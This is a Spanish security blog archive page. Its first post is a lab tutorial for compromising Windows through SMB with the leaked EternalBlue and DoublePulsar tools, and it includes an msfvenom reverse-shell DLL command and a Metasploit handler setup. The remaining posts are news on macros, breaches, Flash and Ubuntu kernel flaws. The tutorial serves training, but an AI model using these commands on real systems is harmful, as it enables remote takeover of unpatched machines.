Categoría : Vulnerabilidades

Inicio/Seguridad Informática/Archivo por Categoría Vulnerabilidades

How to: explotando Eternalblue + Doublepulsar

Hace pocos días saltaba la noticia de que se el grupo Shadow Brokers había liberado una nueva hornada de exploits de la NSA. Por si esto fuera poco, en el github donde están los exploits también hay información sobre como atacar a los sistemas bancarios.

La gran mayoría de los exploits publicados hacen que comprometer un sistema Windows sea cosa de niños y casi como vemos en las películas, puesto que ente ellos se encuentran varios 0-day (ahora ya parcheados por Microsoft) que atacan al protocolo SMB en todas sus versiones.

De todos los exploits disponibles, el que más ha llamado la atención a la comunidad ha sido el combo del llamado Eternalblue + Doublepulsar. En este post vamos a explicar cómo desplegar un entorno de pruebas donde poder probar los exploits.

(Aclaración: Sobra decir que la información se proporciona a título informativo y didáctico, con objeto de colaborar a mejorar el conocimiento de los técnicos en ciberseguridad. Los cibercriminales no necesitan que nadie les enseñe cómo utilizar los exploits.).

Necesitaremos:

  1. Máquina Virtual Windows atacante.
  2. Maquina Vitrual Windows víctima.
  3. Equipo con Linux.

Una vez desplegadas las máquinas virtuales de Windows, el primer paso es preparar una de ellas como la atacante. En esta debemos satisfacer una serie de requisitos para poder utilizar el framework Fuzzbunch, que es desde donde lanzaremos los exploits. Para ello se debe descargar el repositorio del git donde se han publicado los exploits y herramientas.

Se puede hacer con un “git clone” o descargando el repositorio directamente:

Una vez clonado el repositorio en nuestro equipo, habrá que acceder al directorio Windows que está dentro de EQGRP_Lost_in_Translation y crear la carpeta listeningposts. Si no hacemos esto, al intentar ejecutar Fuzzbunch nos saltará un error avisando de que no encuentra el directorio.

Para poder ejecutar el framework correctamente y sin ningún error se necesita de una versión antigua de Python y de Pywin32:

  1. Python 2.6.6 de 32bits (se ha probado con Python 2.7 y no funciona).
  2. PyWin32-221 para Python 2.6.6.
  3. Jre-6u15-windows-i-586.

Una vez esté todo instalado vamos a pasar a la acción. Aquí utilizaremos powershell pero también se puede hacer mediante cmd.

Uso del Framework Fuzzbunch

Desde el directorio EQGRP_Lost_in_Translation/windows ejecutamos Python fb.py para acceder al framework, e introducimos los siguientes parámetros:

  • Default Default target IP Addres [] : IP de la víctima.
  • Dafault Callback Addres [] : IP de nuestra máquina Windows.
  • Use redirection[yes] : Establecer a ‘no’.
  • Base Log directory [D:\logs] : Establecer la ruta para almacenar los logs.

Acto seguido hay que crear un proyecto. Una vez realizados estos pasos, veremos en el prompt fb>

Ilustración 1 Terminal del framework

Para visualizar qué exploits hay disponibles podemos teclear Show Exploits:

Ilustración 2 Exploits disponibles

Como se ha comentado anteriormente, en este post se va a explicar Eternalblue (auque no salga en la lista, está disponible) junto con Doublepulsar. Muy por encima, Eternalblue se encarga de crear un backdoor y Doublepulsar inyecta una dll en el proceso del sistema que queramos.

Eternalblue

Para hacer uso de Eternalblue hay que teclear use Eternalblue y acto seguido introducir la información solicitada por pantalla:

Ilustración 3 Configurando Eternalblue

Si todo ha salido bien veremos el siguiente mensaje en el terminal:

Ilustración 4 Ejecución terminada con éxito

Doublepulsar

Con la backdor creada con Eternalblue, el próximo paso a realizar es inyectar una dll en un proceso del sistema comprometido haciendo uso de Doublepulsar.

Para generar la dll podemos hacer uso de msfvenom:

msfvenom -a x64 -p windows/meterpreter/reverse_tcp lhost=IP lport=PUERTO -f dll -o raccoon64V2.dll

Y desde metasploit dejar un handler esperando a recibir una conexión desde la máquina comprometida:

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

[..]

Volviendo a Doublepulsar, como en el proceso anterior hay que introducir la información que va apareciendo en el terminal:

Ilustración 5 Configuración Doublepulsar

Si lo hemos hecho todo bien, tendremos en nuestro equipo local un meterpreter con privilegios SYSTEM sobre la máquina virtual víctima. Con unos sencillos pasos y un par de clicks hemos llegado a comprometer un equipo conociendo solo su dirección IP.

Ilustración 6 Sesión de meterpreter

Por último y no menos importante, una vez tengamos la conexión con el meterpreter deberemos volver a ejecutar Doublepulsar y seleccionar la opción:

4) Uninstall           Remove's backdoor from system

Para eliminar la backdoor, puesto que ya no la necesitamos.

Ilustración 7 Eliminación de la backdoor

Como se ha podido observar, resulta alarmante la facilidad con la que se consigue comprometer un sistema Windows haciendo uso de estos exploits.

En estos momentos creo que todo el mundo se estará preguntando: ¿si esto es lo que se ha publicado, que más cosas tendrán los chicos buenos de la NSA?

 

Visto en: SecurityatWork

UN NUEVO TRUCO PERMITE INFECTAR DE VIRUS CON UN SIMPLE DOCUMENTO WORD

Es de sobra conocido que, aunque sea algo difícil comprender, a través de documentos de ofimática tipo Word, Excel y PowerPoint es realmente sencillo infectar un ordenador de virus. ¿Por qué? Porque, entendiéndolo de forma simplificada, en la suite Office hay una función denominada ‘macro’ que permite lanzar sobre cualquier ordenador que ejecute el documento una serie de instrucciones automatizadas, entre las cuales están las correspondientes a una infección de diferentes formas de malware. Y recientemente se ha encontrado un nuevo ‘truco’ que permite burlar la seguridad que impide que esto ocurra.

 Las macros de Microsoft Office vuelven a dar problemas, ahora se pueden ocultar simplemente cambiando la extensión de un archivo

Los programas de Microsoft en el entorno de ofimática manejan varios tipos de extensiones, y en el caso de Word podemos encontrar, entre algunas otras, las extensiones DOCX y DOTX. Las dos anteriores son de documentos ‘simples’, sin macros, luego fiables en tanto que no pueden abrir instrucciones automatizadas en el ordenador. Y hay otras, como DOCM y DOTM, que también corresponden al procesador de textos Word, y que con la letra ‘M’ en su nombre ya indican que contienen macros, luego pueden plantear la duda de si serán maliciosas o no.

Un nuevo truco permite infectar de virus con un simple documento Word

El problema está en que recibir un documento con las extensiones DOCM y DOTM, por no contener macros, hasta ahora no era una práctica de ‘riesgo’, al menos por estas cuestiones. Y ahora sí, porque se ha detectado que, sin editar el archivo, cambiar la extensión de documentos con macros a la de un documento sin macros no es detectado por los programas de Microsoft. Es decir, que podemos recibir un archivo con macros, y que se muestre con la extensión DOCX o DOTX, e igualmente sea abierto por Microsoft Office y ejecutado con sus macros.

Por lo tanto, para los usuarios la única recomendación posible por parte de los expertos en seguridad informática es que deshabiliten la ejecución automática de macros y activen el procedimiento manual para, de esta forma, únicamente habilitar las macros para documentos de fuentes fiables, y en los que no haya riesgo de infección por conocimiento de su origen fiable. Esto para usuarios con versiones desactualizadas, porque Microsoft ya ha introducido el parche correspondiente en su última versión.

Fuente: Cinco Días

Ethical Hacking Consultores en “El InkaHack 2016 – Cusco, Perú”

gonzalo

Tuvimos el agrado de participar en el Evento InkaHack 2016 el cual se llevo a cabo los días 08 y 09 de Julio en la Ciudad de Cusco de Perú. Nuestro delegado especial fue Gonzalo Nina; Especialista en Seguridad Informática y miembro de la familia de EHC.

Gonzalo fue aclamado durante el evento al ganar el Primer Lugar del CTF de Null-life, un reconocido grupo de seguridad en Latinoamérica.

Gonzalo Nina, tuvo el honor de dictar una charla durante el evento la cual se llamo “Pentesting” let the game begin”.

Acá les dejamos un pequeño resumen del contenido de la charla:

Muchos tipos de empresas necesitan realizar una evaluación de seguridad técnica (pentesting), esta charla esta enfocada en los pasos que se realizan así como el uso de técnicas y herramientas para cumplir con el objetivo. Así también se enfocó en presentar una herramienta para realizar ciertas tareas relacionadas al pentesting como la extracción de metadatos de una web y el de scanning de puertos de una IP, estas tareas mediante un bot de telegram que pronto estará disponible.

 

ponentes

Ponentes del InkaHack 2016 (Gonzalo Nina: Segundo de Izq. a Derecha)

palestra

Palestra del InkaHack 2016

La compañía Acer sufrió el robo de 34.500 números de tarjetas de crédito de sus usuarios

En los primeros años en los que se internet se estaba popularizando entre los usuarios y los sistemas de seguridad no eran tan fiables como los actuales, con navegar un poco por internet encontrabas un gran número de aplicaciones que nos permitían generar números de tarjetas de crédito, para poder así acceder a los servicios que requerían una suscripción de pago, modelo de suscripción que cayó por su propio peso aunque en los últimos años parece que está volviendo nuevamente a estar de moda, sobre todo en los medios de comunicación, donde los periódicos tradicionales están cambiado la forma de acceder a su información.

Personalmente nunca me atreví a intentar probar si funcionaban o no, y después de la película Juegos de Guerra nunca se sabía… A lo que voy es que las tarjetas de crédito están a la orden del día y es uno de los tesoros más preciados por todos los amigos de lo ajeno. La compañía Acer ha anunciado que ha sufrido un ataque informático en el que los hackers han conseguido acceder a la información más importante que la compañía tiene de sus clientes: las tarjetas de crédito. Pero para hacerlo realmente mal, la compañía almacenada en la misma base de datos el vencimiento y los dígitos de seguridad que se muestran en la parte trasera. Tengo entendido que esa información no la pueden almacenar las empresas, pero eso es otro tema.

Al parecer los datos sustraídos afectan a los usuarios de Estados Unidos, Canadá y Puerto Rico, usuarios que hayan realizado alguna operación de económica con la compañía entre el 12 de mayo de 2015 y el 28 de abril de 2016. El número total de afectados supera los 34.500 y la compañía se está poniendo en contacto personalmente con todos ellos para que anulen las tarjetas lo más pronto posible. De momento no se sabe nada acerca de este ataque, tan solo que la compañía ha informado casi dos meses tarde desde que sucedió el ataque, algo que no verán con buenos ojos los clientes de la compañía.

Fuenteactualidad gadget

Detectada una nueva vulnerabilidad crítica en Adobe Flash Player

Lamentablemente cada vez son más habituales los fallos de seguridad descubiertos en Adobe Flash Player y precisamente la preocupación por los fallos que estos pueden provocar en los equipos de los usuarios de determinados navegadores está haciendo que cada vez sean más los que lo bloquean por defecto. Hoy día, al contrario de lo que solía suceder hace tan sólo unos meses, estamos ante uno de los componentes más inseguros que puedas ejecutar, tal es es caso que incluso la compañía ha asumido finalmente que no pueden seguir desarrollándolo.

Si todavía estás utilizando este componente y hasta ahora has hecho caso omiso de las recomendaciones, comentarte que en esta ocasión ah sido la Oficina de Seguridad del Internauta del Instituto Nacional de Ciberdelincuencia la que anuncia la detección e un nuevo agujero de seguridad que afecta literalmente a todas las versiones de Adobe Flash Player, incluida la más actual (21.0.0.242) para los sistema operativos Chrome OS, Linux, Windows y Mac OS X.

Según ha transcendido, hablamos de una vulnerabilidad de tipo Zero Day (Día Cero) en al que se aprovecha los fallos de seguridad presentes en el software que se está ejecutando para poder así realizar diversas acciones maliciosas en los ordenadores de las víctimas. Tal y como era de esperar, la compañía no ha querido escribir los detalles el bug para evitar así que los ciberdelincuentes puedan aprovecharlo. En cambio, si que han comentado que este error puede literalmente permitir que un atacante tome el control remoto de un dispositivo y ejecutar cualquier acción.

Atendiendo a las declaraciones de Adobe, al parecer hasta mañana día 16 de junio de 2016 no estará disponible la actualización de seguridad con la que se solucionará el problema por lo que, hasta entonces, es más que recomendable desactivar la aplicación en todos los navegadores donde se encuentre instalada y lista para ser ejecutada. Una vez el nuevo parche de seguridad esté disponible se descargará de manera automática.

Fuente: actualidad gadget

Actualización del kernel para Ubuntu Linux

Ubuntu ha publicado una actualización del kernel para Ubuntu 14.04 LTS que soluciona 10 nuevas vulnerabilidades que podrían ser aprovechadas por atacantes para provocar denegaciones de servicio, obtener información sensible o comprometer los sistemas afectados.

Los problemas corregidos residen en la obtención de información sensible a través del driver Ethernet Atheros L2 (CVE-2016-2117), obtención de información sensible o denegaciones de servicio por lecturas fuera de límite en OZMO USB sobre drivers de dispositivos wifi (CVE-2015-4004), una condición de carrera en TLB (Translation Lookaside Buffer) del kernel de Linux (CVE-2016-2069),denegación de servicio a través del controlador USB de dispositivo digitalizador GTCO (CVE-2016-2187) y desactivación de protección ASLR (Address Space Layout Randomization) (CVE-2016-3672).

Por otra parte una denegación de servicio local por uso después de liberar en el controlador USB CDC Network Control Model (CVE-2016-3951), una escritura fuera de límites en la implementación USB/IP podría permitir la ejecución remota de código arbitrario (CVE-2016-3955), fuga de información en las implementaciones de ANSI/IEEE 802.2 LLC type 2 Support (CVE-2016-4485) y en la interfaz socket de rutado netlink (rtnetlink) (CVE-2016-4486) y por último una denegación de servicio local en fs/pnode.c (CVE-2016-4581).

Detalles sobre la aplicación de ésta actualización se encuentran disponibles en:

https://wiki.ubuntu.com/Security/Upgrades.

Más información:

USN-2989-1: Linux kernel vulnerabilities

http://www.ubuntu.com/usn/usn-2989-1/

Fuente: Hispasec

190 millones de cuentas comprometidas en VK.com

La base de datos de la red social más grande de Rusia VK.com (Vkontakte), dueños también de Telegram, es la última gran filtración en línea. La base de datos contiene información como nombres completos (nombres y apellidos), correos electrónicos, información de la ubicación del usuario, direcciones, números de teléfono y las contraseñas de texto plano. Sí, las contraseñas de texto plano y al parecer fueron obtenidas de esa manera desde la base de datos de VK.com.

El mismo atacante “Peace_of_mind” que también  vende los datos de MySpace, Tumblr, LinkedIn y Fling.com, ahora está vendiendo más de 100 millones de registros de VK.com por sólo 1 Bitcoin (aprox. US$ 580).

La violación de datos fue divulgada inicialmente por el motor de búsqueda LeakedSource, que recibió porciones de la base de datos de una de las personas que lo compraron. La compañía ya ha analizado el contenido y lo ha añadido a su servicio (pago). Por lo tanto, se puede utilizar su motor de búsqueda para comprobar correos electrónicos  comprometidos.

VK.com es el “Facebook de Rusia” y se dice que es el sitio más grande de Europa con más de 350 millones de usuarios. Se cree que las credenciales fueron robadas a finales de 2012 o principios de 2013, cuando VK.com tenía casi 190 millones de usuarios.

Parece que todas las infracciones recientes fueron entre 2012 y 2013, cuando muchos sitios web no practicaban políticas adecuadas de seguridad, como tener contraseñas con hash y Salt.

Fuente: Segu info